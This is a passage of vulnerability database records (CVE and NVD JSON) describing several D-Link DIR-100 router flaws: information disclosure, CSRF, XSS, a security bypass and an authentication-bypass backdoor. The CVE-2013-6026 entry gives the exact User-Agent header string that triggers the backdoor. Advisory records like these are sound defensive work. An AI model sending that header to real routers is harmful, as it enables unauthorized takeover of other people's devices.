| http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/90903 | x_refsource_MISC | |
| https://www.securityfocus.com/bid/65290/info | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:53:45.861Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.securityfocus.com/bid/65290/info"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-100 4.03B07 has PPTP and poe information disclosure"
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-02-04T13:56:49",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.securityfocus.com/bid/65290/info"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7055",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "D-Link DIR-100 4.03B07 has PPTP and poe information disclosure"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt",
"refsource": "MISC",
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903",
"refsource": "MISC",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903"
},
{
"name": "https://www.securityfocus.com/bid/65290/info",
"refsource": "MISC",
"url": "https://www.securityfocus.com/bid/65290/info"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7055",
"datePublished": "2020-02-04T13:56:49",
"dateReserved": "2013-12-11T00:00:00",
"dateUpdated": "2024-08-06T17:53:45.861Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-7052
Vulnerability from cvelistv5
Published
2020-02-04 13:49
Modified
2024-08-06 17:53
Severity ?
EPSS score ?
Summary
D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script
References
| ▼ | URL | Tags |
|---|---|---|
| http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/90902 | x_refsource_MISC | |
| https://www.securityfocus.com/bid/65290 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:53:46.075Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.securityfocus.com/bid/65290"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script"
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-02-04T13:49:19",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.securityfocus.com/bid/65290"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7052",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt",
"refsource": "MISC",
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902",
"refsource": "MISC",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
},
{
"name": "https://www.securityfocus.com/bid/65290",
"refsource": "MISC",
"url": "https://www.securityfocus.com/bid/65290"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7052",
"datePublished": "2020-02-04T13:49:19",
"dateReserved": "2013-12-11T00:00:00",
"dateUpdated": "2024-08-06T17:53:46.075Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-7053
Vulnerability from cvelistv5
Published
2020-02-04 13:51
Modified
2024-08-06 17:53
Severity ?
EPSS score ?
Summary
D-Link DIR-100 4.03B07: cli.cgi CSRF
References
| ▼ | URL | Tags |
|---|---|---|
| http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/90905 | x_refsource_MISC | |
| https://www.securityfocus.com/bid/65290/info | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:53:45.879Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.securityfocus.com/bid/65290/info"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-100 4.03B07: cli.cgi CSRF"
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-02-04T13:51:27",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.securityfocus.com/bid/65290/info"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7053",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "D-Link DIR-100 4.03B07: cli.cgi CSRF"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt",
"refsource": "MISC",
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905",
"refsource": "MISC",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905"
},
{
"name": "https://www.securityfocus.com/bid/65290/info",
"refsource": "MISC",
"url": "https://www.securityfocus.com/bid/65290/info"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7053",
"datePublished": "2020-02-04T13:51:27",
"dateReserved": "2013-12-11T00:00:00",
"dateUpdated": "2024-08-06T17:53:45.879Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-7054
Vulnerability from cvelistv5
Published
2020-02-04 13:54
Modified
2024-08-06 17:53
Severity ?
EPSS score ?
Summary
D-Link DIR-100 4.03B07: cli.cgi XSS
References
| ▼ | URL | Tags |
|---|---|---|
| http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/90906 | x_refsource_MISC | |
| https://www.securityfocus.com/bid/65290/info | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:53:45.856Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.securityfocus.com/bid/65290/info"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-100 4.03B07: cli.cgi XSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-02-04T13:54:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.securityfocus.com/bid/65290/info"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7054",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "D-Link DIR-100 4.03B07: cli.cgi XSS"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt",
"refsource": "MISC",
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906",
"refsource": "MISC",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906"
},
{
"name": "https://www.securityfocus.com/bid/65290/info",
"refsource": "MISC",
"url": "https://www.securityfocus.com/bid/65290/info"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7054",
"datePublished": "2020-02-04T13:54:00",
"dateReserved": "2013-12-11T00:00:00",
"dateUpdated": "2024-08-06T17:53:45.856Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
Vulnerability from fkie_nvd
Published
2013-10-19 10:36
Modified
2024-11-21 01:58
Severity ?
Summary
The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:di-524up:-:*:*:*:*:*:*:*",
"matchCriteriaId": "157FE837-AA4B-46AD-A2C2-1E9A690FA7DF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:dlink:di-604\\+:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E8D8643C-5683-429D-9B9F-3A9C2B26ADF6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:dlink:di-604s:-:*:*:*:*:*:*:*",
"matchCriteriaId": "076B3A72-3CF5-49CA-9104-D6D1667CE260",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:dlink:di-604up:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4632D90B-C66E-4E72-B56B-C9B81C3FB85C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:dlink:di-624s:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F92DC565-F84C-4881-AA54-F07C988E3B90",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:dlink:dir-120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "030E2C73-B17D-4F52-83B5-24C2042A5761",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:dlink:tm-g5240:-:*:*:*:*:*:*:*",
"matchCriteriaId": "45DB67B1-BD0F-4B2F-8025-B0A39F821051",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:alphanetworks:vdsl_asl-55052:-:*:*:*:*:*:*:*",
"matchCriteriaId": "38D71280-715B-4872-86DD-528DBD0C4EEE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:alphanetworks:vdsl_asl-56552:-:*:*:*:*:*:*:*",
"matchCriteriaId": "630148D9-4FFC-4630-8D99-4F7DA068D3C1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:planex:brl-04cw:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F22A84F3-0A51-4CF5-B0B2-E41F02D10401",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:planex:brl-04r:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7B26C5C-508E-426B-ACC7-148515E5FFF6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:planex:brl-04ur:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B6E83607-47A8-49B5-8C5B-5A25F8F19389",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, and TM-G5240 routers; Planex BRL-04R, BRL-04UR, and BRL-04CW routers; and Alpha Networks routers allows remote attackers to bypass authentication and modify settings via an xmlset_roodkcableoj28840ybtide User-Agent HTTP header, as exploited in the wild in October 2013."
},
{
"lang": "es",
"value": "La interfaz web de D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604 + y TM-G5240 routers; Planex BRL-04R, Brasil-04UR y routers BRL-04CW, y Redes Alfa enrutadores permite a atacantes remotos evitar la autenticaci\u00f3n y modificar la configuraci\u00f3n especificando un encabezado HTTP User-Agent xmlset_roodkcableoj28840ybtide"
}
],
"id": "CVE-2013-6026",
"lastModified": "2024-11-21T01:58:38.767",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-10-19T10:36:08.963",
"references": [
{
"source": "cret@cert.org",
"tags": [
"Exploit"
],
"url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
},
{
"source": "cret@cert.org",
"url": "http://www.dlink.com/uk/en/support/security"
},
{
"source": "cret@cert.org",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/248083"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.dlink.com/uk/en/support/security"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/248083"
}
],
"sourceIdentifier": "cret@cert.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-264"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-02-04 14:15
Modified
2024-11-21 02:00
Severity ?
Summary
D-Link DIR-100 4.03B07 has PPTP and poe information disclosure
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | Exploit, Third Party Advisory | |
| cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/90903 | VDB Entry | |
| cve@mitre.org | https://www.securityfocus.com/bid/65290/info | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/90903 | VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.securityfocus.com/bid/65290/info | Third Party Advisory, VDB Entry |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-100_firmware | 4.03b07 | |
| dlink | dir-100 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-100_firmware:4.03b07:*:*:*:*:*:*:*",
"matchCriteriaId": "8D1E6935-5331-437A-8768-62CEE0052CB4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-100 4.03B07 has PPTP and poe information disclosure"
},
{
"lang": "es",
"value": "D-Link DIR-100 versi\u00f3n 4.03B07, presenta una divulgaci\u00f3n de informaci\u00f3n de PPTP y poe."
}
],
"id": "CVE-2013-7055",
"lastModified": "2024-11-21T02:00:15.093",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-02-04T14:15:12.450",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"source": "cve@mitre.org",
"tags": [
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.securityfocus.com/bid/65290/info"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.securityfocus.com/bid/65290/info"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-522"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-02-04 14:15
Modified
2024-11-21 02:00
Severity ?
Summary
D-Link DIR-100 4.03B07: cli.cgi XSS
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | Exploit, Third Party Advisory | |
| cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/90906 | Third Party Advisory, VDB Entry | |
| cve@mitre.org | https://www.securityfocus.com/bid/65290/info | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/90906 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.securityfocus.com/bid/65290/info | Third Party Advisory, VDB Entry |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-100_firmware | 4.03b07 | |
| dlink | dir-100 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-100_firmware:4.03b07:*:*:*:*:*:*:*",
"matchCriteriaId": "8D1E6935-5331-437A-8768-62CEE0052CB4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-100 4.03B07: cli.cgi XSS"
},
{
"lang": "es",
"value": "D-Link DIR-100 versi\u00f3n 4.03B07: vulnerabilidad de tipo XSS del archivo cli.cgi."
}
],
"id": "CVE-2013-7054",
"lastModified": "2024-11-21T02:00:14.943",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-02-04T14:15:12.340",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.securityfocus.com/bid/65290/info"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.securityfocus.com/bid/65290/info"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-02-04 14:15
Modified
2024-11-21 02:00
Severity ?
Summary
D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | Exploit, Third Party Advisory | |
| cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/90902 | VDB Entry | |
| cve@mitre.org | https://www.securityfocus.com/bid/65290 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/90902 | VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.securityfocus.com/bid/65290 | Third Party Advisory, VDB Entry |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-100_firmware | 4.03b07 | |
| dlink | dir-100 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-100_firmware:4.03b07:*:*:*:*:*:*:*",
